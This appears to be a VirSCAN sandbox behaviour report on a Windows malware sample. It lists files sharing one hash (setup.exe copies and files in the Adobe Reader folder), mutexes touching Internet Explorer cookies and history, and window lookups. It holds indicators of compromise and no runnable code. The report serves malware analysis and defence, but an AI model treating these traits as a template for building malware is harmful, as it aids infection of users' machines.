C:\DiskX\setup.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\DiskD\setup.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\setup.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\Eula.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\LogTransport2.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
C:\Program Files\Adobe\Reader 9.0\Reader\PDFPrevHndlrShim.exe ---> 11633b67e99ae82cbf8a89f9a45e1da4
Behavior description:打开互斥体
details:ShimCacheMutex
Local\_!MSFTHISTORY!_
Local\c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Local\c:!documents and settings!administrator!cookies!
Local\c:!documents and settings!administrator!local settings!history!history.ie5!
Local\WininetStartupMutex
Local\WininetConnectionMutex
Local\WininetProxyRegistryMutex
RasPbFile
Local\!IETld!Mutex
Local\c:!documents and settings!administrator!ietldcache!
Behavior description:查找指定窗口
details:NtUserFindWindowEx: [Class,Window] = [,]
NtUserFindWindowEx: [Class,Window] = [msctls_statusbar32,]
Run screenshot
VirSCAN

About VirSCAN | Privacy Policy | Contact us | Links | Help VirSCAN
Translated by Keith Miller, United States
Powered By CentOSpol

京ICP备11007605号-12

pol

京公网安备 11010802020746号